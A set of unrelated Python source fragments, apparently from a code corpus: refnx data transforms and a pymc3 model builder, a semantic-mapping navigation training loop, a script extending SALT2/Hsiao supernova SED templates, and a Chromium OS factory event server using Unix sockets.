return "Transform({0})".format(repr(self.form))
def __call__(self, x, y, y_err=None):
"""
Calculate the transformed data
Parameters
----------
x : array-like
x-values
y : array-like
y-values
y_err : array-like
Uncertainties in `y` (standard deviation)
Returns
-------
yt, et : tuple
The transformed data
Examples
--------
>>> x = np.linspace(0.01, 0.1, 11)
>>> y = np.linspace(100, 1000, 11)
>>> y_err = np.sqrt(y)
>>> t = Transform('logY')
>>> ty, te = t(x, y, y_err)
>>> ty
array([2. , 2.2787536 , 2.44715803, 2.56820172, 2.66275783,
2.74036269, 2.80617997, 2.86332286, 2.91381385, 2.95904139,
3. ])
"""
return self.__transform(x, y, y_err=y_err)
def __transform(self, x, y, y_err=None):
r"""
Transform the data passed in
Parameters
----------
x : array-like
y : array-like
y_err : array-like
Returns
-------
yt, et : tuple
The transformed data
"""
if y_err is None:
etemp = np.ones_like(y)
else:
etemp = y_err
if self.form in ["lin", None]:
yt = np.copy(y)
et = np.copy(etemp)
elif self.form == "logY":
yt, et = EP.EPlog10(y, etemp)
if not np.isfinite(yt).all():
warnings.warn(
"Some of the transformed data was non-finite."
" Please check your datasets for points with zero or"
" negative values.",
RuntimeWarning,
)
elif self.form == "YX4":
yt = y * np.power(x, 4)
et = etemp * np.power(x, 4)
elif self.form == "YX2":
yt = y * np.power(x, 2)
et = etemp * np.power(x, 2)
if y_err is None:
return yt, None
else:
return yt, et
def pymc3_model(objective):
"""
Creates a pymc3 model from an Objective.
Requires theano and pymc3 be installed. This is an experimental feature.
Parameters
----------
objective: refnx.analysis.Objective
Returns
-------
model: pymc3.Model
Notes
-----
The varying parameters are renamed 'p0', 'p1', etc, as it's vital in pymc3
that all parameters have their own unique name.
"""
import pymc3 as pm
import theano.tensor as tt
from refnx._lib._pymc3 import _LogLikeWithGrad
basic_model = pm.Model()
pars = objective.varying_parameters()
wrapped_pars = []
with basic_model:
# Priors for unknown model parameters
for i, par in enumerate(pars):
name = "p%d" % i
p = _to_pymc3_distribution(name, par)
wrapped_pars.append(p)
# Expected value of outcome
try:
# Likelihood (sampling distribution) of observations
pm.Normal(
"y_obs",
mu=objective.generative,
sigma=objective.data.y_err,
observed=objective.data.y,
)
except Exception:
# Falling back, theano autodiff won't work on function object
theta = tt.as_tensor_variable(wrapped_pars)
logl = _LogLikeWithGrad(objective.logl)
pm.Potential("log-likelihood", logl(theta))
return basic_model
def | |
from collections import deque, defaultdict
import os
import sys
import logging
import time
import json
import gym
import torch.nn as nn
import torch
import numpy as np
import matplotlib.pyplot as plt
from model import RL_Policy, Semantic_Mapping
from utils.storage import GlobalRolloutStorage
from envs import make_vec_envs
from arguments import get_args
import algo
os.environ["OMP_NUM_THREADS"] = "1"
def main():
args = get_args()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.cuda:
torch.cuda.manual_seed(args.seed)
# Setup Logging
log_dir = "{}/models/{}/".format(args.dump_location, args.exp_name)
dump_dir = "{}/dump/{}/".format(args.dump_location, args.exp_name)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
if not os.path.exists(dump_dir):
os.makedirs(dump_dir)
logging.basicConfig(
filename=log_dir + 'train.log',
level=logging.INFO)
print("Dumping at {}".format(log_dir))
print(args)
logging.info(args)
# Logging and loss variables
num_scenes = args.num_processes
num_episodes = int(args.num_eval_episodes)
device = args.device = torch.device("cuda:0" if args.cuda else "cpu")
g_masks = torch.ones(num_scenes).float().to(device)
best_g_reward = -np.inf
# one episode per process for both train and eval
# for eval, one scene per process
if args.eval:
episode_success = []
episode_spl = []
episode_dist = []
for _ in range(args.num_processes):
episode_success.append(deque(maxlen=num_episodes))
episode_spl.append(deque(maxlen=num_episodes))
episode_dist.append(deque(maxlen=num_episodes))
# for train, different episodes of same scene per process
else:
episode_success = deque(maxlen=1000)
episode_spl = deque(maxlen=1000)
episode_dist = deque(maxlen=1000)
finished = np.zeros((args.num_processes))
wait_env = np.zeros((args.num_processes))
g_episode_rewards = deque(maxlen=1000)
g_value_losses = deque(maxlen=1000)
g_action_losses = deque(maxlen=1000)
g_dist_entropies = deque(maxlen=1000)
per_step_g_rewards = deque(maxlen=1000)
g_process_rewards = np.zeros((num_scenes))
# Starting environments
torch.set_num_threads(1)
envs = make_vec_envs(args)
obs, infos = envs.reset()
full_episode_data = []
episode_data = [None] * num_scenes
for e, info in enumerate(infos):
cInfo = info.copy()
cInfo["episode_data"]["positions"] = []
cInfo["episode_data"]["gt_positions"] = []
cInfo["episode_data"]["goal_rewards"] = []
cInfo["episode_data"]["explore_rewards"] = []
cInfo["episode_data"]["policy_goals"] = []
cInfo["episode_data"]["used_policy"] = []
episode_data[e] = cInfo["episode_data"]
torch.set_grad_enabled(False)
# Initialize map variables:
# Full map consists of multiple channels containing the following:
# 1. Obstacle Map
# 2. Exploread Area (places that are known to be free or occupied)
# 3. Current Agent Location
# 4. Past Agent Locations
# 5,6,7,.. : Semantic Categories
nc = args.num_sem_categories + 4 # num channels
# Calculating full and local map sizes
map_size = args.map_size_cm // args.map_resolution
full_w, full_h = map_size, map_size
local_w = int(full_w / args.global_downscaling)
local_h = int(full_h / args.global_downscaling)
# Initializing full and local map
full_map = torch.zeros(num_scenes, nc, full_w, full_h).float().to(device)
local_map = torch.zeros(num_scenes, nc, local_w,
local_h).float().to(device)
# Initial full and local pose
full_pose = torch.zeros(num_scenes, 3).float().to(device)
local_pose = torch.zeros(num_scenes, 3).float().to(device)
# Origin of local map
origins = np.zeros((num_scenes, 3))
# Local Map Boundaries
lmb = np.zeros((num_scenes, 4)).astype(int)
# Planner pose inputs has 7 dimensions
# 1-3 store continuous global agent location
# 4-7 store local map boundaries
planner_pose_inputs = np.zeros((num_scenes, 7))
# get local boundary (x1, x2, y1, y2) given local agent position (x, y) and map size
def get_local_map_boundaries(agent_loc, local_sizes, full_sizes):
loc_r, loc_c = agent_loc
local_w, local_h = local_sizes
full_w, full_h = full_sizes
if args.global_downscaling > 1:
gx1, gy1 = loc_r - local_w // 2, loc_c - local_h // 2
gx2, gy2 = gx1 + local_w, gy1 + local_h
if gx1 < 0:
gx1, gx2 = 0, local_w
if gx2 > full_w:
gx1, gx2 = full_w - local_w, full_w
if gy1 < 0:
gy1, gy2 = 0, local_h
if gy2 > full_h:
gy1, gy2 = full_h - local_h, full_h
else:
gx1, gx2, gy1, gy2 = 0, full_w, 0, full_h
return [gx1, gx2, gy1, gy2]
# initialize global and local maps and poses given that initial position
# is at map center with 0 orientation
def init_map_and_pose():
full_map.fill_(0.)
full_pose.fill_(0.)
full_pose[:, :2] = args.map_size_cm / 100.0 / 2.0
locs = full_pose.cpu().numpy()
planner_pose_inputs[:, :3] = locs
for e in range(num_scenes):
r, c = locs[e, 1], locs[e, 0]
loc_r, loc_c = [int(r * 100.0 / args.map_resolution),
int(c * 100.0 / args.map_resolution)]
# 3x3 grid around agent location is considered explored
full_map[e, 2:4, loc_r - 1:loc_r + 2, loc_c - 1:loc_c + 2] = 1.0
lmb[e] = get_local_map_boundaries((loc_r, loc_c),
(local_w, local_h),
(full_w, full_h))
planner_pose_inputs[e, 3:] = lmb[e]
origins[e] = [lmb[e][2] * args.map_resolution / 100.0,
lmb[e][0] * args.map_resolution / 100.0, 0.]
for e in range(num_scenes):
local_map[e] = full_map[e, :,
lmb[e, 0]:lmb[e, 1],
lmb[e, 2]:lmb[e, 3]]
local_pose[e] = full_pose[e] - \
torch.from_numpy(origins[e]).to(device).float()
# identical to above, except for specific environment
def init_map_and_pose_for_env(e):
full_map[e].fill_(0.)
full_pose[e].fill_(0.)
full_pose[e, :2] = args.map_size_cm / 100.0 / 2.0
locs = full_pose[e].cpu().numpy()
planner_pose_inputs[e, :3] = locs
r, c = locs[1], locs[0]
loc_r, loc_c = [int(r * 100.0 / args.map_resolution),
int(c * 100.0 / args.map_resolution)]
full_map[e, 2:4, loc_r - 1:loc_r + 2, loc_c - 1:loc_c + 2] = 1.0
lmb[e] = get_local_map_boundaries((loc_r, loc_c),
(local_w, local_h),
(full_w, full_h))
planner_pose_inputs[e, 3:] = lmb[e]
origins[e] = [lmb[e][2] * args.map_resolution / 100.0,
lmb[e][0] * args.map_resolution / 100.0, 0.]
local_map[e] = full_map[e, :, lmb[e, 0]:lmb[e, 1], lmb[e, 2]:lmb[e, 3]]
local_pose[e] = full_pose[e] - \
torch.from_numpy(origins[e]).to(device).float()
# reward is the newly explored area in a given step (in m^2)
def update_intrinsic_rew(e):
prev_explored_area = full_map[e, 1].sum(1).sum(0)
full_map[e, :, lmb[e, 0]:lmb[e, 1], lmb[e, 2]:lmb[e, 3]] = \
local_map[e]
curr_explored_area = full_map[e, 1].sum(1).sum(0)
intrinsic_rews[e] = curr_explored_area - prev_explored_area
intrinsic_rews[e] *= (args.map_resolution / 100.)**2 # to m^2
def get_random_goal(e):
for _ in range(20):
goal = np.random.rand(2)
goal = [int(goal[0] * local_w), int(goal[1] * local_w)]
goal = [min(goal[0], int(local_w-1)), min(goal[1], int(local_w-1))]
if not local_map[e, 1, goal[0], goal[1]]: break
return goal
init_map_and_pose()
# Global policy observation space
ngc = 8 + args.num_sem_categories
es = 2
g_observation_space = gym.spaces.Box(0, 1, # binary local map
(ngc,
local_w,
local_h), dtype='uint8')
# Semantic Mapping
sem_map_module = Semantic_Mapping(args).to(device)
sem_map_module.eval()
intrinsic_rews = torch.zeros(num_scenes).to(device)
# Predict semantic map from frame 1
poses = torch.from_numpy(np.asarray(
[infos[env_idx]['sensor_pose'] for env_idx in range(num_scenes)])
).float().to(device)
# args (obs, pose_obs, maps_last, poses_last)
_, local_map, _, local_pose = \
sem_map_module(obs, poses, local_map, local_pose)
locs = local_pose.cpu().numpy()
for e in range(num_scenes):
r, c = locs[e, 1], locs[e, 0]
loc_r, loc_c = [int(r * 100.0 / args.map_resolution),
int(c * 100.0 / args.map_resolution)]
local_map[e, 2:4, loc_r - 1:loc_r + 2, loc_c - 1:loc_c + 2] = 1.
episode_data[e]["positions"].append([int(loc_r + lmb[e, 0]), int(loc_c + lmb[e, 2]), int(locs[e, 2])])
episode_data[e]["gt_positions"].append(list(infos[e]["gt_pos"]))
global_goals = [get_random_goal(e) for e in range(num_scenes)]
goal_maps = [np.zeros((local_w, local_h)) for _ in range(num_scenes)]
for e in range(num_scenes):
goal_maps[e][global_goals[e][0], global_goals[e][1]] = 1
episode_data[e]["policy_goals"].append(((global_goals[e] + lmb[e, [0,2]]).tolist(), 0))
episode_data[e]["used_policy"].append(True)
planner_inputs = [{} for e in range(num_scenes)]
for e, p_input in enumerate(planner_inputs):
p_input['map_pred'] = local_map[e, 0, :, :].cpu().numpy() # obstacles
p_input['exp_pred'] = local_map[e, 1, :, :].cpu().numpy() # explored
p_input['pose_pred'] = planner_pose_inputs[e] # global location+local map bounds
p_input['goal'] = goal_maps[e] # global_goals[e]
p_input['new_goal'] = 1
p_input['found_goal'] = 0
p_input['wait'] = wait_env[e] or finished[e]
if args.visualize or args.print_images:
local_map[e, -1, :, :] = 1e-5 # TODO: what is this?
# single channel where each grid loc is cat ID
p_input['sem_map_pred'] = local_map[e, 4:, :, :
].argmax(0).cpu().numpy()
obs, _, done, infos = envs.plan_act_and_preprocess(planner_inputs)
start = time.time()
g_reward = 0
torch.set_grad_enabled(False)
spl_per_category = defaultdict(list)
success_per_category = defaultdict(list)
for step in range(args.num_training_frames // args.num_processes + 1):
if finished.sum() == args.num_processes:
break
g_step = (step // args.num_local_steps) % args.num_global_steps # global step num in PPO
l_step = step % args.num_local_steps # local step num in global step
# ------------------------------------------------------------------
# Reinitialize variables when episode ends
l_masks = torch.FloatTensor([0 if x else 1
for x in done]).to(device)
g_masks *= l_masks
for e, x in enumerate(done):
if x:
spl = infos[e]['spl']
success = infos[e]['success']
dist = infos[e]['distance_to_goal']
spl_per_category[infos[e]['goal_name']].append(spl)
success_per_category[infos[e]['goal_name']].append(success)
if args.eval:
episode_success[e].append(success)
episode_spl[e].append(spl)
episode_dist[e].append(dist)
if len(episode_success[e]) == num_episodes:
finished[e] = 1
episode_data[e]["success"] = success
episode_data[e]["spl"] = spl
episode_data[e]["distance_to_goal"] = dist
full_map[e, :, lmb[e, 0]:lmb[e, 1], lmb[e, 2]:lmb[e, 3]] = local_map[e]
episode_data[e]["explored_area"] = full_map[e, 1].sum(1).sum(0).item()
scene = episode_data[e]["scene_id"][16:-4]
if args.save_maps:
np.save('{}/maparr_{}_{}'.format(dump_dir, scene, episode_data[e]['episode_id']), full_map[e].cpu().numpy())
full_episode_data.append(episode_data[e])
cInfo = infos[e].copy()
cInfo["episode_data"]["positions"] = []
cInfo["episode_data"]["gt_positions"] = []
cInfo["episode_data"]["goal_rewards"] = []
cInfo["episode_data"]["explore_rewards"] = []
cInfo["episode_data"]["policy_goals"] = []
cInfo["episode_data"]["used_policy"] = []
episode_data[e] = cInfo["episode_data"]
else:
episode_success.append(success)
episode_spl.append(spl)
episode_dist.append(dist)
wait_env[e] = 1.
update_intrinsic_rew(e)
init_map_and_pose_for_env(e)
# ------------------------------------------------------------------
# ------------------------------------------------------------------
# Semantic Mapping Module
poses = torch.from_numpy(np.asarray(
[infos[env_idx]['sensor_pose'] for env_idx
in range(num_scenes)])
).float().to(device)
_, local_map, _, local_pose = \
sem_map_module(obs, poses, local_map, local_pose)
locs = local_pose.cpu().numpy()
planner_pose_inputs[:, :3] = locs + origins
local_map[:, 2, :, :].fill_(0.) # Resetting current location channel
# update current location
for e in range(num_scenes):
r, c = locs[e, 1], locs[e, | |
<filename>SNDATA_ADDONS/snsedextend.py
#! /usr/bin/env python
#S.rodney
# 2011.05.04
"""
Extrapolate the Hsiao SED down to 300 angstroms
to allow the W filter to reach out to z=2.5 smoothly
in the k-correction tables
"""
import os
from numpy import *
from pylab import *
sndataroot = os.environ['SNDATA_ROOT']
MINWAVE = 300 # min wavelength for extrapolation (Angstroms)
MAXWAVE = 18000 # max wavelength for extrapolation (Angstroms)
def mkSALT2_UV2IR( showplots=False ) :
""" do all the extrapolations needed to extend the SALT2
model deep into the UV and the IR (300 to 25000 angstroms)
and out to +100 days after peak
"""
import shutil
indir = os.path.join( sndataroot, 'models/SALT2/SALT2.Guy10_LAMOPEN' )
outdir = os.path.join( sndataroot, 'models/SALT2/SALT2.Guy10_UV2IR' )
indat = os.path.join(indir,'salt2_color_correction.dat')
outdat = os.path.join(outdir,'salt2_color_correction.dat')
if not os.path.isfile( outdat ) : shutil.copy( indat, outdat )
outinfo = os.path.join(outdir,'SALT2.INFO')
fout = open(outinfo,'w')
print >> fout, """
# open rest-lambda range WAAAY beyond nominal 2900-7000 A range.
RESTLAMBDA_RANGE: 300. 25000.
COLORLAW_VERSION: 1
COLORCOR_PARAMS: 2800 7000 4 -0.537186 0.894515 -0.513865 0.0891927
COLOR_OFFSET: 0.0
MAG_OFFSET: 0.27
SEDFLUX_INTERP_OPT: 1 # 1=>linear, 2=>spline
ERRMAP_INTERP_OPT: 1 # 0=snake off; 1=>linear 2=>spline
ERRMAP_KCOR_OPT: 1 # 1/0 => on/off
MAGERR_FLOOR: 0.005 # don;t allow smaller error than this
MAGERR_LAMOBS: 0.1 2000 4000 # magerr minlam maxlam
MAGERR_LAMREST: 0.1 100 200 # magerr minlam maxlam
"""
extendSALT2_temp0( salt2dir = 'models/SALT2/SALT2.Guy10_UV2IR',
tailsedfile = 'snsed/Hsiao07.extrap.dat',
wjoinblue = 2800, wjoinred = 8500 ,
wmin = 300, wmax = 25000, tmin=-20, tmax=100,
showplots=showplots )
extendSALT2_temp1( salt2dir = 'models/SALT2/SALT2.Guy10_UV2IR',
wjoinblue = 2000, wjoinred = 8500 ,
wmin = 300, wmax = 25000, tmin=-20, tmax=100,
wstep = 10, showplots=showplots )
for sedfile in ['salt2_lc_dispersion_scaling.dat',
'salt2_lc_relative_covariance_01.dat',
'salt2_lc_relative_variance_0.dat',
'salt2_lc_relative_variance_1.dat',
'salt2_spec_covariance_01.dat',
'salt2_spec_variance_0.dat',
'salt2_spec_variance_1.dat' ] :
indat = os.path.join( indir, sedfile )
outdat = os.path.join( outdir, sedfile )
extrapolatesed_flatline( indat, outdat, showplots=showplots )
def getsed( sedfile = os.path.join( sndataroot, 'snsed/Hsiao07.dat') ) :
d,w,f = loadtxt( sedfile, unpack=True )
#d = d.astype(int)
days = unique( d )
dlist = [ d[ where( d == day ) ] for day in days ]
wlist = [ w[ where( d == day ) ] for day in days ]
flist = [ f[ where( d == day ) ] for day in days ]
return( dlist, wlist, flist )
def plotsed( sedfile= os.path.join( sndataroot, 'snsed/Hsiao07.dat'),
day='all', normalize=False, **kwarg):
dlist,wlist,flist = getsed( sedfile )
#days = unique( dlist )
for i in range( len(wlist) ) :
thisday = dlist[i][0]
#defaults = { 'label':str(thisday) }
#plotarg = dict( kwarg.items() + defaults.items() )
if day!='all' :
if abs(thisday-day)>0.6 : continue
if normalize :
plot( wlist[i], flist[i]/flist[i].max()+thisday, **kwarg )
else :
plot( wlist[i], flist[i], label=str(thisday), **kwarg )
# user_in=raw_input('%i : return to continue'%i)
def extrapolatesed_linear(sedfile, newsedfile, minwave=MINWAVE, maxwave=MAXWAVE, Npt=2,tmin=-20, tmax=100, showplots=False ):
""" use a linear fit of the first/last Npt points on the SED
to extrapolate """
from scipy import interpolate as scint
from scipy import stats
import shutil
dlist,wlist,flist = getsed( sedfile )
dlistnew, wlistnew, flistnew = [],[],[]
fout = open( newsedfile, 'w' )
for i in range( len(dlist) ) :
d,w,f = dlist[i],wlist[i],flist[i]
wavestep = w[1] - w[0]
# blueward linear extrapolation from first N points
wN = w[:Npt]
fN = f[:Npt]
(a,b,rval,pval,stderr)=stats.linregress(wN,fN)
Nbluestep = len( arange( minwave, w[0], wavestep ) )
wextBlue = sorted( [ w[0] -(i+1)*wavestep for i in range(Nbluestep) ] )
fextBlue = array( [ max( 0, a * wave + b ) for wave in wextBlue ] )
# redward linear extrapolation from first N points
wN = w[-Npt:]
fN = f[-Npt:]
(a,b,rval,pval,stderr)=stats.linregress(wN,fN)
Nredstep = len( arange( w[-1], maxwave, wavestep ) )
wextRed = sorted( [ w[-1] + (i+1)*wavestep for i in range(Nredstep) ] )
fextRed = array( [ max( 0, a * wave + b ) for wave in wextRed ] )
wnew = append( append( wextBlue, w ), wextRed )
fnew = append( append( fextBlue, f ), fextRed )
# dnew = zeros( len(wnew) ) + d[0]
for i in range( len( wnew ) ) :
print >> fout, "%5.1f %10i %12.7e"%( d[0], wnew[i], fnew[i] )
fout.close()
return( newsedfile )
def extrapolatesed_flatline(sedfile, newsedfile, minwave=MINWAVE, maxwave=MAXWAVE, tmin=-20, tmax=100, showplots=False ):
""" use a linear fit of the first/last Npt points on the SED
to extrapolate """
from scipy import interpolate as scint
from scipy import stats
import shutil
dlist,wlist,flist = getsed( sedfile )
dlistnew, wlistnew, flistnew = [],[],[]
olddaylist = [ round(d) for d in unique(ravel(array(dlist))) ]
fout = open( newsedfile, 'w' )
newdaylist = range( tmin, tmax+1 )
fmed = []
for thisday in newdaylist :
if thisday in olddaylist :
iday = olddaylist.index( thisday )
d,w,f = dlist[iday],wlist[iday],flist[iday]
wavestep = w[1] - w[0]
# blueward flatline extrapolation from first point
Nbluestep = len( arange( minwave, w[0], wavestep ) )
wextBlue = sorted( [ w[0] -(i+1)*wavestep for i in range(Nbluestep) ] )
fextBlue = array( [ f[0] for wave in wextBlue ] )
# redward flatline extrapolation from last point
Nredstep = len( arange( w[-1], maxwave, wavestep ) )
wextRed = sorted( [ w[-1] + (i+1)*wavestep for i in range(Nredstep) ] )
fextRed = array( [ f[-1] for wave in wextRed ] )
wnew = append( append( wextBlue, w ), wextRed )
fnew = append( append( fextBlue, f ), fextRed )
fmed.append( median(f) )
else :
fscaleperday = median( array(fmed[-19:]) / array(fmed[-20:-1]) )
fnew = fnew * fscaleperday**(thisday-thisdaylast)
if showplots :
clf()
plot( w, f, 'r-' )
plot( wnew, fnew, 'k--' )
ax = gca()
rcParams['text.usetex']=False
text(0.95,0.95,'%s\nDay=%i'%(os.path.basename(newsedfile),thisday),ha='right',va='top',transform=ax.transAxes )
draw()
userin = raw_input('return to continue')
for i in range( len( wnew ) ) :
print >> fout, "%5.1f %10i %12.7e"%( thisday, wnew[i], fnew[i] )
thisdaylast = thisday
fout.close()
return( newsedfile )
def extendNon1a():
import glob
import shutil
sedlist = glob.glob("non1a/SED_NOEXTRAP/*.SED")
for sedfile in sedlist :
newsedfile = 'non1a/' + os.path.basename( sedfile )
print("EXTRAPOLATING %s"%sedfile)
extrapolatesed_linear(sedfile, newsedfile, minwave=MINWAVE, maxwave=MAXWAVE, tmin=-20, tmax=100, Npt=2 )
print(" Done with %s.\a\a\a"%sedfile)
def extendSALT2_temp0( salt2dir = 'models/SALT2/SALT2.Guy10_UV2IR',
tailsedfile = 'snsed/Hsiao07.extrap.dat',
wjoinblue = 2800, wjoinred = 8500 ,
wmin = 300, wmax = 25000, tmin=-20, tmax=100,
showplots=False ):
""" extend the salt2 Template_0 model component
by adopting the UV and IR tails from another SED model.
The default is to use SR's extrapolated modification
of the Hsiao 2007 sed model, scaled and joined at the
wjoin wavelengths, and extrapolated out to wmin and wmax.
"""
import shutil
sndataroot = os.environ['SNDATA_ROOT']
salt2dir = os.path.join( sndataroot, salt2dir )
temp0fileIN = os.path.join( salt2dir, '../SALT2.Guy10_LAMOPEN/salt2_template_0.dat' )
temp0fileOUT = os.path.join( salt2dir, 'salt2_template_0.dat' )
temp0dat = getsed( sedfile=temp0fileIN )
tailsedfile = os.path.join( sndataroot, tailsedfile )
taildat = getsed( sedfile=tailsedfile )
dt,wt,ft = loadtxt( tailsedfile, unpack=True )
taildays = unique( dt )
fscale = []
# build up modified template from day -20 to +100
outlines = []
daylist = range( tmin, tmax+1 )
for i in range( len(daylist) ) :
thisday = daylist[i]
if thisday < 50 :
# get the tail SED for this day from the Hsiao template
it = where( taildays == thisday )[0]
dt = taildat[0][it]
wt = taildat[1][it]
ft = taildat[2][it]
# get the SALT2 template SED for this day
d0 = temp0dat[0][i]
w0 = temp0dat[1][i]
f0 = temp0dat[2][i]
print( 'splicing tail onto template for day : %i'%thisday )
i0blue = argmin( abs(w0-wjoinblue) )
itblue = argmin( abs( wt-wjoinblue))
i0red = argmin( abs(w0-wjoinred) )
itred = argmin( abs( wt-wjoinred))
itmin = argmin( abs( wt-wmin))
itmax = argmin( abs( wt-wmax))
bluescale = f0[i0blue]/ft[itblue]
redscale = f0[i0red]/ft[itred]
d0new = dt.tolist()[itmin:itblue] + d0.tolist()[i0blue:i0red] + dt.tolist()[itred:itmax+1]
w0new = wt.tolist()[itmin:itblue] + w0.tolist()[i0blue:i0red] + wt.tolist()[itred:itmax+1]
f0newStage = (bluescale*ft).tolist()[itmin:itblue] + f0.tolist()[i0blue:i0red] + (redscale*ft).tolist()[itred:itmax+1]
# compute the flux scaling decrement from the last epoch (for extrapolation)
if i>1: fscale.append( np.where( np.array(f0newStage)<=0, 0, ( np.array(f0newStage) / np.array(f0new) ) ) )
f0new = f0newStage
# elif thisday < 85 : | |
# Copyright 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import abc
import errno
import json
import logging
import os
import pickle
import queue
import select
import socket
import socketserver
import sys
import tempfile
import threading
import time
import traceback
from cros.factory.utils import file_utils
from cros.factory.utils import process_utils
from cros.factory.utils import time_utils
from cros.factory.utils import type_utils
# Environment variable storing the path to the endpoint.
CROS_FACTORY_EVENT = 'CROS_FACTORY_EVENT'
# Maximum allowed size for messages. If messages are bigger than this, they
# will be truncated by the seqpacket sockets.
_MAX_MESSAGE_SIZE = 65535
# Maximum size of logged event data in debug log. Sometimes a test may pass
# large data to JavaScript functions. If all of it is logged, it can easily take
# up all disk space.
_MAX_EVENT_SIZE_FOR_DEBUG_LOG = 512
# Hello message send by the server and expected as the first datagram by
# the client.
_HELLO_MESSAGE = b'\1'
def json_default_repr(obj):
"""Converts an object into a suitable representation for
JSON-ification.
If obj is an object, this returns a dict with all properties
not beginning in '_'. Otherwise, the original object is
returned.
"""
if isinstance(obj, object):
return {k: v for k, v in obj.__dict__.items() if not k.startswith('_')}
return obj
class Event:
"""An event object that may be written to the event server.
E.g.:
event = Event(Event.Type.STATE_CHANGE,
test='foo.bar',
state=TestState(...))
"""
class Type:
# The state of a test has changed.
STATE_CHANGE = 'goofy:state_change'
# The UI has come up.
UI_READY = 'goofy:ui_ready'
# Tells goofy to clear all state and restart testing.
RESTART_TESTS = 'goofy:restart_tests'
# Tells goofy to run all tests that haven't been run yet.
AUTO_RUN = 'goofy:auto_run'
# Tells goofy to set all failed tests' state to untested and re-run.
RUN_TESTS_WITH_STATUS = 'goofy:run_tests_with_status'
# Clears state of all tests underneath the given path.
CLEAR_STATE = 'goofy:clear_state'
# Tells the UI about a single new line in the log.
LOG = 'goofy:log'
# A hello message to a new WebSocket. Contains a 'uuid' parameter
# identification the particular invocation of the server.
HELLO = 'goofy:hello'
# A keepalive message from the UI. Contains a 'uuid' parameter
# containing the same 'uuid' value received when the client received
# its HELLO.
KEEPALIVE = 'goofy:keepalive'
# Initializes the test UI.
INIT_TEST_UI = 'goofy:init_test_ui'
# Sets layout for the test UI.
SET_TEST_UI_LAYOUT = 'goofy:set_test_ui_layout'
# Sets the UI in the test pane.
SET_HTML = 'goofy:set_html'
# Import a HTML fragment to test pane.
IMPORT_HTML = 'goofy:import_html'
# Runs JavaScript in the test pane.
RUN_JS = 'goofy:run_js'
# Performs a remote procedure call to the Chrome extension inside UI.
EXTENSION_RPC = 'goofy:extension_rpc'
# Event from a test UI.
TEST_UI_EVENT = 'goofy:test_ui_event'
# Message from test UI to new event loop to end the event loop.
END_EVENT_LOOP = 'goofy:end_event_loop'
# Message to tell the test UI to destroy itself.
DESTROY_TEST = 'goofy:destroy_test'
# Message telling Goofy should re-read system info.
UPDATE_SYSTEM_INFO = 'goofy:update_system_info'
# Tells Goofy to stop all tests.
STOP = 'goofy:stop'
# Indicates a pending shutdown.
PENDING_SHUTDOWN = 'goofy:pending_shutdown'
# Cancels a pending shutdown.
CANCEL_SHUTDOWN = 'goofy:cancel_shutdown'
# Tells UI to update notes.
UPDATE_NOTES = 'goofy:update_notes'
# Diagnosis Tool's events
DIAGNOSIS_TOOL_EVENT = 'goofy:diagnosis_tool:event'
# Notifies that factory server config (URL, timeout) is changed.
FACTORY_SERVER_CONFIG_CHANGED = 'factory_server:config_changed'
# Notifies that the iterations or retries of a factory test is changed.
SET_ITERATIONS_AND_RETRIES = 'goofy:set_iterations_and_retries'
def __init__(self, type, **kw): # pylint: disable=redefined-builtin
self.type = type
self.timestamp = time.time()
for k, v in kw.items():
setattr(self, k, v)
def __repr__(self):
return type_utils.StdRepr(
self,
extra=[
'type=%s' % self.type,
'timestamp=%s' % time.ctime(self.timestamp)],
excluded_keys=['type', 'timestamp'])
def to_json(self):
return json.dumps(self, default=json_default_repr)
@staticmethod
def from_json(encoded_event):
kw = json.loads(encoded_event)
type = kw.pop('type') # pylint: disable=redefined-builtin
return Event(type=type, **kw)
def __eq__(self, other):
return (isinstance(other, Event) and
json_default_repr(self) == json_default_repr(other))
def __ne__(self, other):
return not self == other
_unique_id_lock = threading.Lock()
_unique_id = 1
def get_unique_id():
global _unique_id # pylint: disable=global-statement
with _unique_id_lock:
ret = _unique_id
_unique_id += 1
return ret
class EventServerRequestHandler(socketserver.BaseRequestHandler):
"""Request handler for the event server.
This class is agnostic to message format (except for logging).
"""
def setup(self):
socketserver.BaseRequestHandler.setup(self)
threading.current_thread().name = (
'EventServerRequestHandler-%d' % get_unique_id())
# A thread to be used to send messages that are posted to the queue.
self.send_thread = None
# A queue containing messages.
self.queue = queue.Queue()
def handle(self):
# The handle() methods is run in a separate thread per client
# (since EventServer has ThreadingMixIn).
logging.debug('Event server: handling new client')
try:
self.server._subscribe(self.queue) # pylint: disable=protected-access
# Send hello, now that we've subscribed. Client will wait for
# it before returning from the constructor.
self.request.send(_HELLO_MESSAGE)
self.send_thread = process_utils.StartDaemonThread(
target=self._run_send_thread,
name='EventServerSendThread-%d' % get_unique_id())
# Process events: continuously read message and broadcast to all
# clients' queues.
while True:
msg = self.request.recv(_MAX_MESSAGE_SIZE + 1)
if len(msg) > _MAX_MESSAGE_SIZE:
logging.error('Event server: message too large')
if not msg:
break # EOF
self.server._post_message(msg) # pylint: disable=protected-access
except socket.error as e:
if e.errno in [errno.ECONNRESET, errno.ESHUTDOWN, errno.EPIPE]:
pass # Client just quit
else:
raise
finally:
logging.debug('Event server: client disconnected')
self.queue.put(None) # End of stream; make writer quit
self.server._unsubscribe(self.queue) # pylint: disable=protected-access
def _run_send_thread(self):
while True:
message = self.queue.get()
if message is None:
return
try:
self.request.send(message)
except Exception:
return
class EventServer(socketserver.ThreadingUnixStreamServer):
"""An event server that broadcasts messages to all clients.
This class is agnostic to message format (except for logging).
"""
allow_reuse_address = True
socket_type = socket.SOCK_SEQPACKET
daemon_threads = True
def __init__(self, path=None):
"""Constructor.
Args:
path: Path at which to create a UNIX stream socket.
If None, uses a temporary path and sets the CROS_FACTORY_EVENT
environment variable for future clients to use.
"""
# pylint: disable=super-init-not-called
# A set of queues listening to messages.
self._queues = set()
# A lock guarding the _queues variable.
self._lock = threading.Lock()
self._temp_path = None
if not path:
path = tempfile.mktemp(prefix='cros_factory_event.')
os.environ[CROS_FACTORY_EVENT] = path
logging.info('Setting %s=%s', CROS_FACTORY_EVENT, path)
self._temp_path = path
# pylint: disable=non-parent-init-called
socketserver.UnixStreamServer.__init__(
self, path, EventServerRequestHandler)
def server_close(self):
"""Cleanup temporary file"""
socketserver.ThreadingUnixStreamServer.server_close(self)
if self._temp_path is not None:
file_utils.TryUnlink(self._temp_path)
def _subscribe(self, q):
